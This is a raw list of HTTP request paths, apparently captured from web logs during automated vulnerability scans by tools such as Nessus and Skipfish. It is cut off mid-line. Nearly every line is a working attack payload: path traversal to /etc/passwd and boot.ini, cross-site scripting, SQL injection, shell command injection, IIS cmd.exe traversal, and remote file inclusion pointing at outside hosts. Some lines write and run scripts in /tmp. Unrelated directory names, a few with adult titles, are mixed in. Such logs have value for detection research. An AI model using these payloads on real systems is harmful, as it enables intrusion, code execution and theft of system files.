descriptions/\n/top.php?stuff=\"&uname\\x09#\n/../.dump\n/javascript/goaway.exe\n/ju0u7kfo.idc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/msmmask.exe?mask=/nessus1246303797.asp\n/scripts/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/6qbynt4f.php3?<script>cross_site_scripting.nasl</script>\n/cgi-bin/db4web_c/dbdirnikto//etc/passwd\n/manager/source?v=../../../../../../../../../../etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/./tmp/qkzpkuflrb.sh;echo|awstats916038.txt\n/cgi-bin/bb-hist?histfile=../../../../../../../../../../etc/passwd\n/speaker-transcripts/\n/cgi-bin/index.php?src=1&_common=1&time=1332010405&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=&ver,>q51168469&rem,\n/help_text_vars.php?pgv_base_directory=../../../../../../../../../../boot.ini\\x00\n/examples/jsp/jsp2/el/misc/audio.php?recording=../version.inc\n/en-us/jnv890lt.mscgi?<script>cross_site_scripting.nasl</script>\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\\x00\n/javascript/success.exe\n/examples/jsp/cal/mylog.html?screen=/etc/passwd\n/phpwebsite/index.php?module=fatcat&fatcat[user]=viewcategory&fatcat_id=1\\x00+\\\"><script>alert('vulnerable')</script>\n/examples/jsp/jsp2/jspx/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/top.php?stuff=\"\\x0drm q75872817 #\n/examples/jsp/cal/port.php?proto=tcp'\n/javascript/ie.exe\n/javascript/daily.exe\n/scripts/cxvae_g3rjys.pl\n/catalog_products_with_images.php/\"><script>alert(414476083578)</script><\"\n/a0imiuf1.asp?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/bmeun223.mscgi?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='226544801\n/qhvu0pdg.php?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+e0+00+8e+81+0b+01+02+19+00+02+00+00+00+04+00+00+00+00+00+00+00+10+00+00++>>ctdn\n/it's a daddy thing/\n/scripts/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/main.php?logout=\"sleep\\x097\\x09#\n/top.php?stuff=\"sleep\\x098\\x09#\n/escript_tests/\n/scripts/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/javascript/resize.exe\n/examples/jsp/jsp2/jspx/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/javascript/strut.exe\n/t7tm4m0b.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/index.cfm?fuseaction=category.display&category_id='\n/5qnlm5z2.php?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/vac1l5vm.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331922018\")</script>\n/en-us/<script>cross_site_scripting.nasl</script>.html\n/scripts/axdgpyi2bn6f.cgi\n/main.php?stuff='&sleep\\x099\\x09#\n/examples/jsp/jsp2/jspx/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/scripts/.www_acl\n/l752x1ry.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jackrabbit/search.jsp?q=%\"<script>alert(1331918998)</script>\n/0w155a7c.asp?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/remindpasswd\n/script56/\n/<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/top.php?stuff=\"ping;-w;7000;-n;1;1.2.3.4|rem;\n/en-us/s7qus4g3.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/cgi-bin/admin/top.php?admindir=/etc/passwd\\x00\n/certsrv/..%5cwinnt/system32/cmd.exe?/c+dir\n/scripts/newsscript.pl?mode=admin\n/t7tm4m0b.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/index.php?act=arcade&do=stats&gameid=1'\n/6qbynt4f.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/tick/test.php?path_to_code=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/en-us/account/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/perl.exe?-v\n/help.php?q=\"&ping;-w;10000;-n;1;1.2.3.4&rem;\n/_mem_bin/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/scripts/.%2e/.2e/winnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe 3hrgytw.exe\n/scripts/1331918962-ror_session_fixation.nasl\n/main.php?logout=\"ping;-w;8000;-n;1;1.2.3.4&rem;\n/en-us/hipkz026.fts?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/help.php?q=\"ver\\x0b>q49522765&rem\\x0b\n/examples/jsp/num/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/help.php?q=&rm;q11223182&rem;\n/zuihld5m.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d7ktpmcq.asp?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/oie504mr.dll?<script>document.cookie=\"testtpby=7052;\"</script>\n/examples/jsp/jsp2/el/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/dslpwt15.dll?<script>document.cookie=\"testtkio=5454;\"</script>\n/ydexw8by.aspx?<script>document.cookie=\"testulex=4996;\"</script>\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331919000\")</script>\n/9ko6m4c8.php?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/b5xdqgz2.htm?<script>cross_site_scripting.nasl</script>\n/main.php?logout='\\x0auname >q82997141 #\n/javascript/document.config\n/qb2xy9aw.mscgi?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/zuihld5m.cfm?<script>cross_site_scripting.nasl</script>\n/nyvbv05h.htm?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/examples/jsp/sessions/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/examples/jsp/sessions/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/esmozg5d.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='\\x0dsleep 7 #\n/qhvu0pdg.exe?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/xlj7h65o.jsp?<script>document.cookie=\"testtbbe=856;\"</script>\n/help.php?q='&rm q95359585 #\n/help.php?q=\"&ping;-w;11000;-n;1;4.3.2.1&rem;\n/en-us/s7qus4g3.idc?<script>cross_site_scripting.nasl</script>\n/o'reilly/\n/en-us/n9xlumt5.asp?<script>cross_site_scripting.nasl</script>\n/j734qobz.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/leaders.exe\n/scripts/index.php?board=nonexistant631739669\n/manager/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/javascript/unpaid.exe\n/help.php?q='\\x0duname #\n/fo564rei.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ddoworrl.fts?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/h21y8w52.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/2014.exe\n/frogger's/\n/u95h6ymu.htm?<script>document.cookie=\"testkhwc=4028;\"</script>\n/egaet53a.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?frm_daynight=day&frm_passwd=q11835754&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=\n/examples/jsp/jsp2/el/js/scripts.php?load=/etc/passwd\\x00\n/scripts/add.cgi\n/main.php?logout=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/lmw4r201.aspx?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/javascript/font.exe\n/recordings/simple/view_page?mv_arg=|cat /etc/passwd|\n/static//%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd\n/gomscript/\n/examples/jsp/sessions/docs.php?doc=../jpgraph-1.12.1/docs/index\n/scripts/1hactwocbsuo.html\n/um7xpn15.nsf?<script>document.cookie=\"testotoy=6142;\"</script>\n/tuwjta1w.aspx?<script>document.cookie=\"testpokn=7494;\"</script>\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(890611287)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(2103042060)</script>\n/sphera/login/sm_login_screen.php?error=\\\"><script>alert('vulnerable')</script>\n/psynch/nph-psf.exe?css=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/6qbynt4f.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/psynch/nph-psa.exe?css=@rfiurl\n/cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd\n/examples/jsp/jsp2/el/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/appswithpythonscripting/\n/bmeun223.do?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/examples/jsp/jsp2/jspx/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/main.php?logout=\"&rm\\x0bq19661861&rem\\x0b\n/examples/jsp/num/htsearch?exclude=`/etc/passwd`\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,2000273248 --\n/main.php?stuff=\"&rm\\x09q95679894&rem\\x09\n/recommend.php?entryid='</a><iframe src=javascript:alert(%27xss%27)></iframe>\n/uvazfs7p.jsp?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/welwcbtdbf0;').\"]=1\n/u95h6ymu.aspx?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/top.php?stuff=\"\\x0adel q15138829 #\n/examples/jsp/num/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/main.php?stuff=\"rm\\x09q65882978\\x09#\n/help.php?q=\\x0duname >q66931265 #\n/cgi-bin/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/ht8pn8uq.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/scripts/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/php scripts/\n/examples/jsp/cal/bb-hist.sh?histfile=../../../../../etc/passwd\n/help.php?q=';rm q95782248 #\n/m2fpztty.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/rot13sj.cgi?/etc/passwd\n/<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/manager/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/m5103snj.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 846061434,2,198865279,4,5,6,7,8,9,0,1,2,3 --\n/en-us/9kr0ih0v.htm?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/user.php?caselist[bad_file.txt][path]=http://192.168.202.118:8080/moclyxlwqyfjnp?&command=cat /etc/passwd\n/javascript/count.exe\n/examples/jsp/cal/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/jackrabbit/search.jsp?q=%\"<script>alert(1331904190)</script>\n/htbin/ion-p.exe?page=c:\\winnt\\repair\\sam\n/scripts/n4p4f4gtbhia.sh\n/i2n4v4rl.exe?<script>cross_site_scripting.nasl</script>\n/top.php?stuff='\\x0duname >q21221735 #\n/en-us/h5sc3gxy.pl?<script>cross_site_scripting.nasl</script>\n/conscription_gifts/\n/main.php?stuff=\"&ver\\x09>q95961944&rem\\x09\n/main.php?logout=\"\\x0auname >q92897682 #\n/cacti/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/scripts/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/scripts/.%2e/..5cwinnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe burfxmu.exe\n/help.php?q=\"&ping -w 7000 -n 1 4.3.2.1&rem \n/help.php?q=\"|ping -w 11000 -n 1 4.3.2.1|rem \n/i686v90l.jspa?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/l13b77e5.pl?<script>document.cookie=\"testjvvf=7721;\"</script>\n/scripts/cgi-bin/login.cgi\n/?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/help.php?q=\"ver&rem,\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904226\n/top.php?stuff='&del\\x09q76524279\\x09#\n/examples/jsp/jsp2/jspx/index.php?op=default&date=200607' union select 1,1515512280,1,1,1,1,1,1,1,1--&blogid=1\n/help.php?q=\"ver\\x09>q91583756&rem\\x09\n/t578vqea.htm?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/ht8pn8uq.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/examples/jsp/jsp2/jspx/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/scripts/index.php?op=default&date=200607' union select 1,1779141938,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/rihzp7swr3p6.php\n/userscripts/\n/0w155a7c.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7dbjwpw6.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/faq.php?action=&type=view&s=&id=-1' union select 0,1377586613,0,0,0,0,0--\n/top.php?stuff=\"ping;-w;10000;-n;1;4.3.2.1|rem;\n/scgi-bin/msmmask.exe?mask=/junk334\n/en-us/account/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010409',null,null,null,null --\n/voting_script/\n/spa_description/\n/i7prbs22.jspa?<script>document.cookie=\"testjnre=7328;\"</script>\n/xlj7h65o.dll?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/examples/jsp/num/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/who's your daddy - jenna haze/\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331905207,2042987140 --\n/scripts/samba/smbshr.pl\n/en-us/odzk29aa.aspx?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/manager/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/weq93ppb.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"&rm\\xa0q12371867&rem\\xa0\n/recordings/phptonuke.php?filnavn=/etc/passwd\n/scripts/top.php?header=../../../../../../../../etc/passwd\n/examples/jsp/colors/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/en-us/account/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/top.php?stuff=\"&ping -w 11000 -n 1 4.3.2.1&rem \n/iktok2bw.dll?<script>cross_site_scripting.nasl</script>\n/script/template/index.php?main_page_directory=http://192.168.202.118:8080/2aibfaczmac8?\n/x'squeezeme!_v4/\n/examples/jsp/error/include/sql.php?include_path=/etc/passwd\\x00\n/javascript/document.shtml\n/subscriptions.key\n/examples/servlets/servlet/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/top.php?stuff=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/recordings/nslookup.cgi?query=localhost;id&type=any&ns=\n/xlj7h65o.x?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/fc9t54l7.php3?<script>document.cookie=\"testggad=2000;\"</script>\n/edv3mapy.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/shop/normal_html.cgi?file=;cat /etc/passwd|\n/scripts/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/fmnveedu.php3?<script>document.cookie=\"testgfbr=7014;\"</script>\n/examples/jsp/error/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/ghswfouu.pl?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/www/delivery/ac.php?bannerid=-1331904222+or+1=1+--+';passthru(base64_decode($_server[http_nessus_sgcjosth]));die;/*\n/quagynka.pl?<script>cross_site_scripting.nasl</script>\n/fioricet_prescription/\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/0rufe52p.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"&sleep\\x099\\x09#\n/webcgi/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/help.php?q=&ver,>q53768417&rem,\n/freejobdescription/\n/0z575z74.asp?<script>document.cookie=\"testuhsv=9753;\"</script>\n/cgi-bin/admin/admin.php?sid='\n/0qhcnefz.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/scs86g1p.html?<script>document.cookie=\"testquyx=2820;\"</script>\n/t3af3tdz.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_1olrgkbn]));die;/*\n/xfkun1ku.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ygkjkngd.aspx?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/javascript/document.tar\n/n1afe1y6.htm?<script>cross_site_scripting.nasl</script>\n/wscript/\n/top.php?stuff=\"del,q37582953&rem,\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331919000\n/admin/news.admin.php?path_to_script=@rfiurl?cmd=ls&path_to_script=@rfiurl?\n<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/album.php?albumid=1'414095588137\n/javascript/document.html\n/en-us/9kr0ih0v.mscgi?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/javascript/cf.exe\n/recordings/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/javascript/head.exe\n/nmw0do67.htm?<script>cross_site_scripting.nasl</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/ebdxfyfaow.sh+>+/dev/null+&').\"]=1\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=&scr_height=q59254632&scr_width=\n/h5i6crm3.mscgi?<script>document.cookie=\"testlihk=7070;\"</script>\n/raanw4ia.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\";sleep\\x097\\x09#\n/admin/departments.php?projectissueid=\"><script>alert(412536083479)</script><\"\n/javascript/.htaccess.sfish/http://skipfish.invalid/;?\n/top.php?stuff='&del q77845858 #\n/scripts/type.asp?itype='duware_itype_sql_injection.nasl\n/en-us/dda2qr7j.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=uname\\x09>q84495678\\x09#\n/pbserver/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/n1afe1y6.php3?<script>cross_site_scripting.nasl</script>\n/egaet53a.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sdk/../../../../../../../etc/vmware/hostd/vminventory.xml\n/javascript/funding.exe\n/g8nu2yy7.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/prescription-ultracet/\n/ytbl_description/\n/whois.cgi?action=load&whois=;id\n/cgibin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/en-us/odzk29aa.jsp?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/help.php?q=&ver\\xa0>q39682963&rem\\xa0\n/sandscript/\n/newsarchive.php?path_to_script=@rfiurl?cmd=ls&path_to_script=@rfiurl?\n/javascript/htpasswd.save\n/?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/examples/servlets/servlet/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/javascript/tls.exe\n/manager/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/vhzmaia2.mscgi?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/en-us/account/calendar.php?serverpath=/etc/passwd\\x00\n/xlj7h65o.do?<script>document.cookie=\"testtbbe=856;\"</script>\n/zmvq66jy.fts?<script>cross_site_scripting.nasl</script>\n/javascript/showthread.exe\n/examples/jsp/colors/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/ao22ww7y.dll?<script>document.cookie=\"testqppc=8767;\"</script>\n/miz4r5hz.jsp?<script>document.cookie=\"testviqu=1270;\"</script>\n/examples/jsp/colors/way-board/way-board.cgi?db=/etc/passwd\\x00\n/javascript/web.exe\n/help.php?q=\"&ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/scripts/snpfiltered.pl?t=c&u=<script>foo</script>\n/top.php?stuff=';rm\\x09q14376774\\x09#\n/global_scripts/\n/7o5qp766.aspx?<script>cross_site_scripting.nasl</script>\n/main.php?logout=;uname >q35486244 #\n/scripts/mt.cgi?__mode=logout\n/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/top.php?stuff=\\x0auname\\x09>q56166211\\x09#\n/examples/jsp/checkbox/home/search.asp?nchannel='1\n/javascript/backdoor.exe\n/cacti/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/40;15531212/\n/examples/jsp/jsp2/jspx/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/scripts/include/help.php?base=http://xxxxxxxx\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.~1~\n/igtf0zon.nsf?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"&del\\x09q79499365\\x09#\n/examples/jsp/colors/calendar.php?serverpath=/etc/passwd\\x00\n/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://192.168.202.118:8080/zz5thkvtmlgl?\n/phpbb/viewtopic.php?topic_id=<script>alert('vulnerable')</script>\n/examples/jsp/colors/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/en-us/odzk29aa.x?<script>document.cookie=\"testtfvh=2141;\"</script>\n/scripts/config/oramon.ini\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331908887,4,5\n/manager/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/scripts/tomcat_proxy_directory_traversal.nasl1331908880\n/i2n4v4rl.idc?<script>cross_site_scripting.nasl</script>\n/javascript/.htaccess/\\'\\\"\n/main.php?stuff=\"&rm\\x0cq27346825&rem\\x0c\n/copatranscript_20061025/\n/scripts/idealbb/default.asp\n/<script>cross_site_scripting.nasl</script>.cfc\n/7o5qp766.do?<script>cross_site_scripting.nasl</script>\n/help.php?q=\\x0duname >q67294529 #\n/g3w7y7u5.mscgi?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/calendar.php?week=\"><script>alert(410276083356)</script>\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=cj6vvbcewxmlk232n\n/aj3pf49c.pl?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/main.php?logout=\"ver&rem\\x0b\n/themes/simple/user_style.php?user_colors[bg_color]=\"</style><script>alert(411155570847)</script>\n/6n7aacgg.cfm?<script>cross_site_scripting.nasl</script>\n/en-us/account/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/scripts/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/failure.asp?err_txt=text</b><script>alert(\"wvs-xss-magic-string-410175568174\");</script><b>text\n/en-us/oie504mr.do?<script>document.cookie=\"testtpby=7052;\"</script>\n/phpwebchat/register.php?register=yes&username=overg&email=<script>alert (\\\"vulnerable\\\")</script>&email1=<script>alert (\\\"vulnerable\\\")</script>\n/d765w06j.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o6ebbirj.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/pfdispaly?../../../../../../etc/passwd\n/mv8wxfy9.html?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/script_path/config.inc.php?_path=http://192.168.202.96:8080/llumt7msyau5y??\nftp://192.168.21.102/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/mcsescripting/\n/bxnyrhmh.cfc?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919012,4,5\n/uc3w3bdi.aspx?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/vjbrrppi.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>\n/hrttz9fj.html?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/n9xlumt5.php?<script>cross_site_scripting.nasl</script>\n/recordings/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/cgi-915/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/main.php?logout='uname\\x09>q59958199\\x09#\n/scripts/2pwudii1mt22.cfm\n/fc9t54l7.jspa?<script>document.cookie=\"testggad=2000;\"</script>\n/main.php?frm_daynight=q52668454&frm_passwd=&frm_referer=http%3a//192.168.26.202/top.php%3fstuff%3d1861731255&frm_user=&scr_height=&scr_width=\n/forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini\n/linuxlivescripts/\n/help.php?q=\"&ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/examples/jsp/checkbox/remindpasswd\n/lisa ann's anal scene - ass cleavage 8/\n/cgi-bin/index.php?id=vqqq98hjfy'\n/xfkun1ku.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&ver&rem\\x0b\n/cacti/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/phpmyadmin/documentation.html?'+convert(int,convert(varchar,0x7b5d))+'=1\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/gjvtlghpjb0;echo|awstats354859.txt\n/scgi-bin/fileseek.cgi?foot=;cat /etc/passwd&head=\n/rv98iwjp.idc?<script>cross_site_scripting.nasl</script>\n/scripts/buoalakxhatu.pl\n/en-us/account/mlog.html?screen=/etc/passwd\n/scripts/wd7crx47eaml.inc\n/xlj7h65o.mscgi?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/cgi-bin/index.php?id=b6q5w0grm_'\n/main.php?logout=\"del;q82885471&rem;\n/top.php?stuff=\"del\\x09q19467518&rem\\x09\n/javascript/printer.exe\n/ovcgi/openview5.exe?target=main&action=../../../../../../../../../..//windows/win.ini\n/cgi-bin/sgdynamo.exe?htname=sgdynamo.exe\n/<script>alert('vulnerable')</script>.thtml\n/rbec2ohx.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/spacer.exe\n/0rufe52p.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/m2fpztty.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/javascript/htpasswd.manifest\n/o1zj4u9v.cfc?<meta http-equiv=set-cookie 